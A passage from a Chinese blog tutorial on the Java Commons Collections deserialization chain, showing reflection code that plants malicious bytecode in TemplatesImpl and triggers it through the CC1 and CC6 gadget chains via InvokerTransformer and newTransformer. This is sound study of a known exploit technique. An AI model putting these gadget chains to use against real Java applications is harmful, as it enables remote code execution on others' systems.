<p>而且他还是我们想要执行的恶意类，一个字节的二维数组类型</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321222119461.png" alt="image-20230321222119461"></p>
<p>另外这个_tfactory也不能为空，不然也会报错</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321221000135.png" alt="image-20230321221000135"></p>
<p>这里我们生成一个恶意类的字节码文件</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321222300927.png" alt="image-20230321222300927"></p>
<p>写完后现在的代码为</p>
<pre class="language-java" data-language="java"><code class="language-java">TemplatesImpl templates &#x3D; new TemplatesImpl();
&#x2F;&#x2F; _name赋值不为null
Field name &#x3D; templates.getClass().getDeclaredField(&quot;_name&quot;);
name.setAccessible(true);
name.set(templates,&quot;123&quot;);
&#x2F;&#x2F; _class赋值为null
Field classField &#x3D; templates.getClass().getDeclaredField(&quot;_class&quot;);
classField.setAccessible(true);
classField.set(templates,null);
&#x2F;&#x2F;加载恶意类的字节码
Field bytecodes &#x3D; templates.getClass().getDeclaredField(&quot;_bytecodes&quot;);
bytecodes.setAccessible(true);
byte[] code &#x3D; Files.readAllBytes(Paths.get(&quot;D:&#x2F;&#x2F;ctftools&#x2F;ctfscript&#x2F;javastudy&#x2F;CC&#x2F;src&#x2F;main&#x2F;java&#x2F;org&#x2F;cc3&#x2F;cmd.class&quot;));
&#x2F;&#x2F;转为二维数组
byte[][] codes &#x3D; &#123;code&#125;;
&#x2F;&#x2F;_tfactory赋值
bytecodes.set(templates,codes);
Field tfactory &#x3D; templates.getClass().getDeclaredField(&quot;_tfactory&quot;);
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());
templates.newTransformer();</code></pre>

<p>但是执行后报了空指针异常</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321222918052.png" alt="image-20230321222918052"></p>
<p>在TemlatesImpl的defineTransletClasses方法里，第422行</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321223042602.png" alt="image-20230321223042602"></p>
<p>搭个断点能看出来因为不满足if判断，进入了else中，然后又因为_auxClasses的值为空，导致的空指针异常</p>
<p>但是这里我们要选让程序满足if判断的方式，而不是给_auxClasses赋值，因为在下面还有一个对_transletIndex的判断（两个都改了也能弹计算器，而且感觉更简单一点</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321224210163.png" alt="image-20230321224210163"></p>
<p>接下来说一下满足if判断的方式</p>
<p>这里superClass是我们构造的恶意类的父类，所以这个if判断就是让我们恶意类的父类的名称和这个ABSTRACT_TRANSLET一样</p>
<p>这个ABSTRACT_TRANSLET是个被赋值的常量</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321224930251.png" alt="image-20230321224930251"></p>
<p>所以只要让我们的恶意类继承一下com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet就好了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321225038543.png" alt="image-20230321225038543"></p>
<p>改完后重新编译一下</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321225547734.png" alt="image-20230321225547734"></p>
<h2 id="CC1的利用"><a href="#CC1的利用" class="headerlink" title="CC1的利用"></a>CC1的利用</h2><p>现在确定只要调用newTransformer方法就可以加载恶意类</p>
<p>那我们还记得在cc1里InvokerTransformer.transform可以反射的方式去调用一些其他的方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230319191708721.png" alt="image-20230319191708721"></p>
<p>所以这里我们以反射调用newTransformer不就行了吗</p>
<p>这里我们改一改CC1的Transformer数组</p>
<pre class="language-java" data-language="java"><code class="language-java">Transformer[] t &#x3D; new Transformer[]&#123;
        new ConstantTransformer(templates),
        new InvokerTransformer(&quot;newTransformer&quot;, null,null)
&#125;;</code></pre>

<p>然后前半部分用我们之前构造的，后面用CC1的就行</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321231854359.png" alt="image-20230321231854359"></p>
<h2 id="CC6的利用"><a href="#CC6的利用" class="headerlink" title="CC6的利用"></a>CC6的利用</h2><p>既然CC1可以，那CC6自然也可以，改的地方也一样，其余部分不动</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321232250015.png" alt="image-20230321232250015"></p>
<h2 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a>调用链</h2><p>这里这个TrAXFilter类的构造函数里调用了newTransformer方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230321230200262.png" alt="image-20230321230200262"></p>
<p>但是这个TrAXFilter类没有实现Serializable接口，所以就不能进行序列化操作。但是就像Runtime也不能进行序列化操作一样，我们可以利用反射把这个传过去</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Ethe</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://Ethe448.github.io/2023/03/19/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BCommonsCollections/">https://Ethe448.github.io/2023/03/19/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BCommonsCollections/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Ethe</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                    <span class="chip bg-color">web学习</span>
                                </a>
                            
                                <a href="/tags/Java/">
                                    <span class="chip bg-color">Java</span>
                                </a>
                            
                                <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                                    <span class="chip bg-color">反序列化</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("https://epicture.oss-cn-beijing.aliyuncs.com/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: '9uxoX9BlIsmwlt8gNkGLF9Ow-gzGzoHsz',
        appKey: 'rrsgRW80sgJP9PdFwFycskT9',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '8',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

<!--酷Q推送-->


    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2023/03/19/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BCommonsCollections/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/20.jpg" class="responsive-img" alt="Java反序列化之CommonsCollections">
                        
                        <span class="card-title">Java反序列化之CommonsCollections</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-03-19
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                        <span class="chip bg-color">web学习</span>
                    </a>
                    
                    <a href="/tags/Java/">
                        <span class="chip bg-color">Java</span>
                    </a>
                    
                    <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                        <span class="chip bg-color">反序列化</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/03/18/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BURLDNS/">
                    <div class="card-image">
                        
                        
                        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/20.jpg" class="responsive-img" alt="Java反序列化之URLDNS">
                        
                        <span class="card-title">Java反序列化之URLDNS</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-03-18
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Ethe
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                        <span class="chip bg-color">web学习</span>
                    </a>
                    
                    <a href="/tags/Java/">
                        <span class="chip bg-color">Java</span>
                    </a>
                    
                    <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
                        <span class="chip bg-color">反序列化</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.min.js"></script>
<script>
$(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/APlayer.min.js"></script>
<script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2023</span>
            
            <a href="/about" target="_blank">Ethe</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">192.2k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Ethe448" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1078240421@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1078240421" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1078240421" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

    <!-- 白天和黑夜主题 -->
<div class="sum-moon-box">
  <a class="btn-floating btn-large waves-effect waves-light" onclick="switchNightMode()" title="切换主题" >
    <i id="sum-moon-icon" class="fas fa-sun" style="width:48px; height:48px; font-size: 28px;"></i>
  </a>
</div>

<script>
  function switchNightMode() {
    $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
      setTimeout(function () {
        $('body').hasClass('DarkMode') 
        ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
        : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
          
        setTimeout(function () {
          $('.Cuteen_DarkSky').fadeOut(1e3, function () {
            $(this).remove()
          })
        }, 2e3)
      })
  }
</script>

    <script>
    //模式判断 
    if (localStorage.getItem('isDark') === '0') {
        document.body.classList.add('DarkMode');
        $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')
    } else {
        document.body.classList.remove('DarkMode');
        $('#sum-moon-icon').removeleClass("fa-sun").addClass('fa-moon')
    }
    </script>

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    
    <script async src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
